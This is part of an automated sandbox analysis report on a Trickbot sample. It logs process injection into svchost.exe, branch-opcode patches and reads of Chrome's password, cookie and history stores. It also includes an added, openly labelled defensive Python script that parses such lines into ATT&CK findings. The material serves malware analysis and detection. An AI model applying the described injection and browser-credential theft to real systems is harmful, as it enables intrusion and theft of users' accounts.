Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1800B9000 (2 identical entries)
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1800BE000 (2 identical entries)
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 (2 identical entries)
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931AF0000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931B00000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931B10000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FFC0000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931AF0000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931B10000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931B30000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931B40000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 19931B60000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FFC0000
Hijacks the control flow in another process
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Memory written: PID: 5016 base: 1767ECB0000 value: FF
Source: C:\Windows\System32\wermgr.exe Memory written: PID: 1728 base: 180001000 value: E9
Source: C:\Windows\System32\wermgr.exe Memory written: PID: 1728 base: 1800B9000 value: FF
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: wermgr.exe, 00000003.00000002.14249801662.0000017600001000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: wermgr.exe, 00000003.00000002.14249801662.0000017600001000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: wermgr.exe, 00000003.00000002.14249801662.0000017600001000.00000002.00020000.sdmp Binary or memory string: Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wermgr.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoA, 1_2_0074A134
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: EnumSystemLocalesA, 1_2_0074A1F6
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: EnumSystemLocalesA, 1_2_0074A220
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 1_2_0074A2C3
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: EnumSystemLocalesA, 1_2_0074A287
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte, 1_2_00757650
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 1_2_007486AD
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoA, 1_2_00741742
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoA, 1_2_00757918
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_00749D6C
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoA, 1_2_00749E61
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 1_2_00749F63
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: GetLocaleInfoW, 1_2_00749F08
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_00747022 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 1_2_00747022

Stealing of Sensitive Information:

Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 5016, type: MEMORYSTR
Source: Yara match File source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies.bak
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
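Added example (not part of the Joe Sandbox report and not code from the sample): a Python triage script that reads behaviour lines in the format used above and turns the three observations that matter in this report into findings. It covers both the injection chain (wermgr.exe writing into svchost.exe, then single-byte patches at 180001000 and 1800B9000, the same addresses the bulk writes landed on, with values E9 and FF, which are the first bytes of the x86 jmp rel32 and FF /2 call or FF /4 jmp encodings) and the Chrome credential-store opens listed in the Stealing of Sensitive Information section. The input lines are constructed from this report's format, including the trailing "Jump to behavior" link text an exported report carries. The ATT&CK mapping, the 0x180000000 image-base heuristic and every function name are this example's own assumptions.

```python
"""Triage of sandbox behaviour lines in the format of the report above.
Added example, not part of the Joe Sandbox report or of the sample."""
import re
from collections import defaultdict

# First byte of the x86/x64 branch encodings that inline hooks are built from.
BRANCH_OPCODES = {0xE8: "call rel32", 0xE9: "jmp rel32", 0xEB: "jmp rel8",
                  0xFF: "call/jmp r/m (FF /2, FF /4)"}

# Heuristic (assumption): 0x180000000 is the default image base the MSVC
# linker gives 64-bit DLLs, so remote writes inside this window are consistent
# with a DLL mapped by hand rather than by the Windows loader.
X64_DLL_IMAGE = range(0x1_8000_0000, 0x1_8000_0000 + 0x100_0000)

# Chrome profile files worth flagging; ATT&CK technique where one fits (assumed mapping).
CHROME_STORES = {"Login Data": ("saved passwords", "T1555.003"),
                 "Web Data": ("autofill and payment data", "T1555.003"),
                 "Cookies": ("session cookies", "T1539"),
                 "History": ("browsing history", None)}

LINK = r"(?:\s+Jump to behavior)?\s*$"  # report link text: tolerated, then dropped
PATCH_RE = re.compile(r"^Source: (\S+) Memory written: PID: (\d+) base: ([0-9A-Fa-f]+) value: ([0-9A-Fa-f]{2})" + LINK)
WRITE_RE = re.compile(r"^Source: (\S+) Memory written: (?!PID:)(\S+) base: ([0-9A-Fa-f]+)" + LINK)
OPEN_RE = re.compile(r"^Source: (\S+) File opened: (.+?)" + LINK)

# Constructed input: a few lines in the report's own format, not the full report.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior",
    r"Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior",
    r"Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 180001000 Jump to behavior",
    r"Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1800B9000 Jump to behavior",
    r"Source: C:\Users\user\Desktop\dngqoAXyDd.exe Memory written: PID: 5016 base: 1767ECB0000 value: FF Jump to behavior",
    r"Source: C:\Windows\System32\wermgr.exe Memory written: PID: 1728 base: 180001000 value: E9 Jump to behavior",
    r"Source: C:\Windows\System32\wermgr.exe Memory written: PID: 1728 base: 1800B9000 value: FF Jump to behavior",
    r"Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak Jump to behavior",
    r"Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior",
    r"Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior",
]

def basename(path):
    """Last component of a Windows path (os.path would not split backslashes on POSIX)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1]

def parse(lines):
    """Split lines into cross-process writes, single-byte patches and file opens."""
    writes, patches, opens = defaultdict(list), [], []
    for line in lines:
        if m := PATCH_RE.match(line.strip()):
            src, pid, base, val = m.groups()
            patches.append((src, int(pid), int(base, 16), int(val, 16)))
        elif m := WRITE_RE.match(line.strip()):
            src, dst, base = m.groups()
            writes[(src, dst)].append(int(base, 16))
        elif m := OPEN_RE.match(line.strip()):
            opens.append((m.group(1), m.group(2).strip()))
    return writes, patches, opens

def triage(lines):
    """Turn parsed events into finding dicts; 'technique' is None where no ATT&CK ID fits."""
    writes, patches, opens = parse(lines)
    findings = []
    for (src, dst), bases in writes.items():
        findings.append({"technique": "T1055", "kind": "cross-process write",
                         "source": basename(src), "target": basename(dst), "count": len(bases),
                         "regions": len(set(bases)),
                         "image_range_hits": sorted({b for b in bases if b in X64_DLL_IMAGE})})
    for src, pid, addr, val in patches:
        if val in BRANCH_OPCODES:  # a branch written into another process: control-flow hijack
            findings.append({"technique": "T1055", "kind": "control-flow patch",
                             "source": basename(src), "pid": pid, "address": addr,
                             "opcode": val, "mnemonic": BRANCH_OPCODES[val]})
    for src, path in opens:
        name = basename(path)
        store = name[:-4] if name.endswith(".bak") else name  # .bak copies count as the store
        if store in CHROME_STORES:
            what, technique = CHROME_STORES[store]
            findings.append({"technique": technique, "kind": "browser store access",
                             "source": basename(src), "store": store, "what": what,
                             "from_backup_copy": name.endswith(".bak")})
    return findings

def render(findings):
    """One line per finding, tagged with the technique (or 'discovery')."""
    out = []
    for f in findings:
        tag = f["technique"] or "discovery"
        if f["kind"] == "cross-process write":
            hits = ", ".join(f"0x{a:X}" for a in f["image_range_hits"]) or "none"
            out.append(f"[{tag}] {f['source']} -> {f['target']}: {f['count']} writes over "
                       f"{f['regions']} regions; x64 DLL image-range hits: {hits}")
        elif f["kind"] == "control-flow patch":
            out.append(f"[{tag}] {f['source']} patched PID {f['pid']} at 0x{f['address']:X} "
                       f"with 0x{f['opcode']:02X} ({f['mnemonic']})")
        else:
            where = "backup copy" if f["from_backup_copy"] else "live file"
            out.append(f"[{tag}] {f['source']} opened Chrome '{f['store']}' ({f['what']}, {where})")
    return out

if __name__ == "__main__":
    print("\n".join(render(triage(SAMPLE_LINES))))
```

Run it directly to see the findings for the constructed lines, or feed it an exported report with `triage(open(path).readlines())`. Two design points: writes and patches are kept apart because a bulk write into a foreign process is already T1055, while a one-byte branch opcode at an address that was just written is the stronger signal that the injected code is being wired into the target's control flow; and accesses to the `.bak` copies are reported with `from_backup_copy` so an analyst can separate reads of a copied database from reads of the live one without losing the match on the store name.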

Remote Access Functionality:

Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 5016, type: MEMORYSTR
Source: Yara match File source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp, type: MEMORY